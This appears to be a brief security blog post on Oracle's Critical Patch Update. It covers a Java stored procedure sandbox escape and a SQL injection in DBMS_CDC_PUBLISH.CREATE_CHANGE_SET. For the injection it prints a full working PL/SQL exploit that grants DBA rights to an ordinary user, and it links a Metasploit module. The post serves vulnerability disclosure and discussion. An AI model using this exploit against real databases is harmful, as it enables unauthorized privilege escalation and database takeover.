There are some very interesting issues fixed by Oracle in this month's Critical Patch Update (CPU). Although, the details about the exact vulnerabilities are still not public. The ones which i found really interesting are:
1. ZDI-10-201: Oracle Database Java Stored Procedure Race Condition Remote Code Execution Vulnerability
" This vulnerability allows remote attackers to break out of the Java Sandbox implemented by Oracle's relational database. Authentication is required in that a user must be able to create a Java stored procedure
to trigger the issue. ".. CVSS score 9
2. SQL Injection in DBMS_CDC_PUBLISH.CREATE_CHANGE_SET reported by Esteben, which could allow any user with EXECUTE_CATALOG_ROLE to become DBA.
the exploit is fairly simple:
--------------------
as SCOTT User:
create or replace function pwn return varchar2 authid current_user is
PRAGMA autonomous_transaction;
BEGIN
execute immediate 'grant dba to scott';
commit;
return 'z';
END;
--
grant execute on SCOTT.pwn to public
--
begin
sys.dbms_cdc_publish.create_change_set('a','a','a''||SCOTT.pwn()||''a','Y',sysdate,
sysdate);
end;
------------------
The exploit is already available in metasploit: https://www.metasploit.com/redmine/projects/framework/repository/revisions/10691/entry/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb. Thanks to MC
This affects 10gR1, 10gR2, 11g R1 and 11gR2. I agree with Appsec Inc that the CVSS score should be 7.5 and not 4.9 which oracle has assigned to it.